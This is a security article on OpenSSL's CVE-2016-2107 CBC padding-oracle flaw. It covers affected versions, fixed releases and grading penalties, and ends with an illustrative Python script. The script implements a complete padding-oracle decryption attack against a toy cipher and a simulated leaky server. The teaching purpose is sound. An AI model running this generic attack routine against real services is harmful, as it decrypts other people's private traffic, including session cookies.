Critical OpenSSL Vulnerability Exposes Servers to MITM Attacks
A high-severity vulnerability in OpenSSL, disclosed in the OpenSSL Security Advisory of 3 May 2016, leaves TLS servers exposed to a padding oracle attack mounted by a man-in-the-middle (MITM). Tracked as CVE-2016-2107, it affects connections negotiated with AES-CBC cipher suites on servers whose OpenSSL build runs the AES-NI accelerated CBC code path. A network attacker who can replay modified records against such a server can use its distinguishable error response as an oracle and decrypt traffic without knowing the key. To reflect this, the grading criteria are being updated to version 2009m, with stricter penalties for vulnerable servers.
Previously, servers vulnerable to this attack were capped at grade C. From 6 June 2016 the cap drops to F for any server found to be at risk, a change intended to push system administrators to patch quickly. The fix shipped with the advisory itself: OpenSSL 1.0.2 users should upgrade to 1.0.2h and OpenSSL 1.0.1 users to 1.0.1t. The bug was introduced by the constant-time padding check added as part of the fix for the Lucky 13 attack (CVE-2013-0169); only the AES-NI code path is affected.
CVE-2016-2107 is a serious threat to servers that negotiate AES-CBC cipher suites and run OpenSSL's AES-NI code. With the grading criteria moving to version 2009m, administrators should upgrade to a fixed release (1.0.2h or 1.0.1t), restart every service that links OpenSSL so the old library is no longer loaded, and re-test, both to close the oracle and to avoid the F cap.
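To make the attack class concrete, the following is a worked Python example of a padding-oracle attack on CBC mode, the mechanism behind CVE-2016-2107. It is added here for illustration and is neither part of the original article nor OpenSSL's code. It assumes a toy 16-byte Feistel block cipher built from HMAC-SHA256 as a stand-in for AES (the attack never looks inside the block cipher, so any cipher would do), a constructed oracle that leaks a single bit (was the PKCS#7 padding valid?), and a constructed key, IV and plaintext; the function and variable names are all hypothetical.

```python
import hashlib
import hmac

BLOCK = 16


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, rnd):
    # Feistel round function: keyed and round-dependent, 8-byte output.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, block):
    # Toy 8-round Feistel cipher over two 8-byte halves; stands in for AES.
    l, r = block[:8], block[8:]
    for rnd in range(8):
        l, r = r, xor(l, _f(key, r, rnd))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(8)):
        l, r = xor(r, _f(key, l, rnd)), l
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += xor(block_decrypt(key, blk), prev)
        prev = blk
    return out


def make_leaky_oracle(key):
    """Models the server side of CVE-2016-2107: the response differs depending
    on whether the decrypted record had valid padding. That one bit is all the
    attacker ever learns; the key and plaintext are never exposed directly."""
    def oracle(iv, ciphertext):
        try:
            pkcs7_unpad(cbc_decrypt(key, iv, ciphertext))
            return True
        except ValueError:
            return False
    return oracle


def recover_block(oracle, prev_block, target_block):
    """Recover one plaintext block using only the oracle. A crafted IV is tuned
    byte by byte, last byte first, until the decrypted block ends in valid
    padding (0x01, then 0x02 0x02, ...), which reveals D_k(target_block)."""
    inter = bytearray(BLOCK)          # D_k(target_block), learned bytewise
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        crafted = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):   # force already-known bytes to pad_val
            crafted[j] = inter[j] ^ pad_val
        for guess in range(256):
            crafted[pos] = guess
            if not oracle(bytes(crafted), target_block):
                continue
            if pos == BLOCK - 1:
                # Rule out an accidental "... 02 02" match: disturbing the
                # preceding byte must not break a genuine 0x01 padding.
                probe = bytearray(crafted)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe), target_block):
                    continue
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("oracle never accepted byte %d" % pos)
    return xor(bytes(inter), prev_block)


def padding_oracle_decrypt(oracle, iv, ciphertext):
    """Decrypt a whole CBC ciphertext given only the oracle, IV and ciphertext."""
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)


# Constructed demo values; the attacker sees only IV and CIPHERTEXT, never KEY.
KEY = hashlib.sha256(b"server-side secret, constructed for the demo").digest()
IV = bytes(range(BLOCK))
MESSAGE = b"GET /account HTTP/1.1\r\nCookie: session=4f3a9c; secure"
CIPHERTEXT = cbc_encrypt(KEY, IV, pkcs7_pad(MESSAGE))


def demo():
    """Run the attack; returns (recovered plaintext, number of oracle queries)."""
    base, queries = make_leaky_oracle(KEY), [0]

    def counted(iv, ct):
        queries[0] += 1
        return base(iv, ct)
    return padding_oracle_decrypt(counted, IV, CIPHERTEXT), queries[0]


if __name__ == "__main__":
    recovered, n = demo()
    print(recovered.decode(), "(recovered with %d oracle queries)" % n)
```

The attack costs at most 256 queries per byte, so a 64-byte record falls in a few thousand requests. In the real vulnerability the signal was the TLS alert the server returned, which differed between the padding-valid and padding-invalid cases; the defence is to make the two failures indistinguishable in both error code and timing, which is what the constant-time record check in the fixed releases is meant to guarantee.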